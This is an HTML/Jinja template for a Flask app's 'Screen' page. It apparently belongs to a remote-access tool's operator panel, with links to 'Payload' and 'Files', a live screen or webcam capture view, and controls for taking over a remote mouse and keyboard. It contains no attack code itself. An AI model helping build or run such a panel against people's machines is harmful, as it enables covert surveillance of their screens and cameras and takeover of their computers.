<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no, maximum-scale=1" />
    <title>Screen</title>
    <script
      src="https://cdnjs.cloudflare.com/ajax/libs/socket.io/3.0.4/socket.io.js"
      integrity="sha512-aMGMvNYu8Ue4G+fHa359jcPb1u+ytAF+P2SCb+PxrjCdO3n3ZTxJ30zuH39rimUggmTwmh2u7wvQsDTHESnmfQ=="
      crossorigin="anonymous"
    ></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/pako/2.1.0/pako.min.js"></script>
    {% if style == True %}
      <link rel="stylesheet" href="{{ url_for('static', filename='css/light/screen.css') }}">
    {% else %}
      <link rel="stylesheet" href="{{ url_for('static', filename='css/dark/screen.css') }}">
    {% endif %}
  </head>
  <body>
    <header>
      <nav>
        <ul>
          <li><a href="/">Control Panel</a></li>
          <li><a href="/payload">Payload</a></li>
          <li><a href="/files">Files</a></li>
          <li><a href="/logout">Logout</a></li>
        </ul>
      </nav>
    </header>

    <h1>Captured Image</h1>

    <div id="popup-alert">
      <div id="popup-message"></div>
      <button id="popup-ok-btn">OK</button>
    </div>
    
    <div class="controls">
      <div class="start-stop">
        <button id="start" class="btn">Start</button>
        <button id="stop" class="btn">Stop</button>
      </div>

      <div class="button-container">
        <button id="mouseInput" class="btn">Toggel mouse control from drill</button>
        <button id="keyboardInput" class="btn">Get Keyboard Input</button>
        <!-- <button id="lockKeyboard" class="btn">Lock Keyboard</button>
        <button id="lockMouse" class="btn">Lock Mouse</button> -->
      </div>

      <select id="screenDropdown">
        <!-- Options will be dynamically populated -->
      </select>
      

      <div class="slider-container">
        <div class="slider-wrapper">
          <div class="slider">
            <div class="slider-highlight" id="sliderHighlight"></div>
            <button class="slider-button" id="screenButton">Screen</button>
            <button class="slider-button" id="cameraButton">Camera</button>
          </div>
        </div>
      </div>
    </div>

    <div class="capture-container">
      <img id="capturedImage" alt="Press Start" draggable="false" class="screenshot" />
    </div>

    {% if show_login == True %}
      <script>
        var show_logout_button = true;
      </script>
    {% else %}
      <script>
        var show_logout_button = false;
      </script>
    {% endif %}
    <script src="{{ url_for('static', filename='js/screen.js') }}"></script>
  </body>
</html>
